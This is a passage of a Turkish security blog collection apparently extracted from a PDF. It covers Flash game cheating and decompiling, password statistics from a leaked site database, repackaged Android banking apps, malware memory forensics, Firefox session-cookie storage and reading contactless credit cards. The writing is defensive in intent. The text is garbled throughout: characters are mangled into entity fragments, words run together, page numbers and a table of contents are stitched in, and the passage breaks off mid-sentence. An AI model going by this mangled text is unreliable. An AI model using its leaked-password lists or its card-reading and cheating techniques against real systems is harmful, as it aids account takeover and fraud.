Hackerlarrsquoın Goumlzuumlnden Flash UygulamalarıSource httpswwwmertsaricacomhackerlarin-gozunden-flash-uygulamalariBy MS on January 30th 2011

Ah o Netsec etkinliğinde bende olsaydım deyipte katılamayanlar iccedilin yapmış olduğum sunumu kısaca yazıya doumlkmeye karar verdim

Oumln bilgi olarak Flash kısaca web sayfalarına animasyon video ve etkileşim eklemek amacıyla kullanılan ve Actionscript adında nesneyoumlnelimli (object oriented) programlama dili iccedileren bir multimedya platformudur Flash uygulamalarına ccediloğunlukla reklamlarda veoyunlarda rastlarız Flash dosyaları ccediloğunlukla SWF (ShockWave Flash) formatında olur ve aslında bir sanal makine olan Flash oynatıcısıtarafından ccedilalıştırılır Flash oynatıcısının bir sanal makine olması sayesinde SWF formatındaki bu dosyalar her platformda ccedilalıştırılabilirDurum boumlyle olunca Javada da olduğu gibi SWF formatındaki bir dosya kolaylıkla baytkoddan (bytecode) kaynak koduna ccedilevrilebilir(decompile) Actionscript ilk olarak animasyonları kontrol etmek iccedilin tasarlanmıştır fakat geliştirilen yeni suumlruumlmleri ile web tabanlıoyunlardan goumlruumlntuuml ve ses yayını yapmaya imkan tanıyan zengin internet uygulamaları geliştirilebilmesine imkan tanımaktadır veJavascript ile aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 7: Hack 4 Career - 2011

7

CONNSCAN komutu ile sistem uumlzerindeki aktif ağ bağlantılarını listelediğimde ise 2888 PIDsi ile ccedilok sayıda bağlantı kurulduğunugoumlrduumlm

PROCEXEDUMP komutu ile indekexe yazılımına ait olan belleği diske kaydettikten sonra strings ve IDA PRO programları ileincelediğimde ise bu zararlı yazılımın SDBOTın bir varyantı olduğunu kolayca anladım

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı 